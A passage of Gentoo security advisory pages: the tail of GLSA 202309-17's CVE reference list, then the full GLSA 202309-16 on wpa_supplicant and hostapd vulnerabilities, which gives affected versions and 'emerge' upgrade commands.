[ 31 ] CVE-2023-1815  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1815  
[ 32 ] CVE-2023-1816  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1816  
[ 33 ] CVE-2023-1817  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1817  
[ 34 ] CVE-2023-1818  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1818  
[ 35 ] CVE-2023-1819  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1819  
[ 36 ] CVE-2023-1820  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1820  
[ 37 ] CVE-2023-1821  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1821  
[ 38 ] CVE-2023-1822  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1822  
[ 39 ] CVE-2023-1823  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1823  
[ 40 ] CVE-2023-2033  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2033  
[ 41 ] CVE-2023-2133  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2133  
[ 42 ] CVE-2023-2134  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2134  
[ 43 ] CVE-2023-2135  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2135  
[ 44 ] CVE-2023-2136  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2136  
[ 45 ] CVE-2023-2137  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2137  
[ 46 ] CVE-2023-2459  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2459  
[ 47 ] CVE-2023-2460  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2460  
[ 48 ] CVE-2023-2461  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2461  
[ 49 ] CVE-2023-2462  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2462  
[ 50 ] CVE-2023-2463  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2463  
[ 51 ] CVE-2023-2464  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2464  
[ 52 ] CVE-2023-2465  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2465  
[ 53 ] CVE-2023-2466  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2466  
[ 54 ] CVE-2023-2467  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2467  
[ 55 ] CVE-2023-2468  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2468  
[ 56 ] CVE-2023-2721  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2721  
[ 57 ] CVE-2023-2722  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2722  
[ 58 ] CVE-2023-2723  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2723  
[ 59 ] CVE-2023-2724  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2724  
[ 60 ] CVE-2023-2725  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2725  
[ 61 ] CVE-2023-2726  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2726  
[ 62 ] CVE-2023-21720  
      https://nvd.nist.gov/vuln/detail/CVE-2023-21720  
[ 63 ] CVE-2023-21794  
      https://nvd.nist.gov/vuln/detail/CVE-2023-21794  
[ 64 ] CVE-2023-23374  
      https://nvd.nist.gov/vuln/detail/CVE-2023-23374  
[ 65 ] CVE-2023-28261  
      https://nvd.nist.gov/vuln/detail/CVE-2023-28261  
[ 66 ] CVE-2023-28286  
      https://nvd.nist.gov/vuln/detail/CVE-2023-28286  
[ 67 ] CVE-2023-29334  
      https://nvd.nist.gov/vuln/detail/CVE-2023-29334  
[ 68 ] CVE-2023-29350  
      https://nvd.nist.gov/vuln/detail/CVE-2023-29350  
[ 69 ] CVE-2023-29354  
      https://nvd.nist.gov/vuln/detail/CVE-2023-29354

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202309-17

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202309-17

Gentoo Linux Security Advisory 202309-16 - Multiple vulnerabilities have been discovered in wpa_supplicant and hostapd, the worst of which could result in arbitrary code execution. Versions greater than or equal to 2.10 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202309-16  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: wpa_supplicant, hostapd: Multiple Vulnerabilities  
     Date: September 30, 2023  
     Bugs: #768759, #780135, #780138, #831332  
       ID: 202309-16

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in wpa_supplicant and  
hostapd, the worst of which could result in arbitrary code execution.

Background  
==========

wpa_supplicant is a WPA Supplicant with support for WPA and WPA2 (IEEE  
802.11i / RSN). hostapd is a user space daemon for access point and  
authentication servers.

Affected packages  
=================

Package                      Vulnerable    Unaffected  
---------------------------  ------------  ------------  
net-wireless/hostapd         < 2.10        >= 2.10  
net-wireless/wpa_supplicant  < 2.10        >= 2.10

Description  
===========

Multiple vulnerabilities have been discovered in hostapd and  
wpa_supplicant. Please review the CVE identifiers referenced below for  
details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All wpa_supplicant users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-wireless/wpa_supplicant-2.10"

All hostapd users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-wireless/hostapd-2.10"

References  
==========

[ 1 ] CVE-2021-30004  
      https://nvd.nist.gov/vuln/detail/CVE-2021-30004  
[ 2 ] CVE-2022-23303  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23303  
[ 3 ] CVE-2022-23304  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23304

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202309-16

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Tag

#mac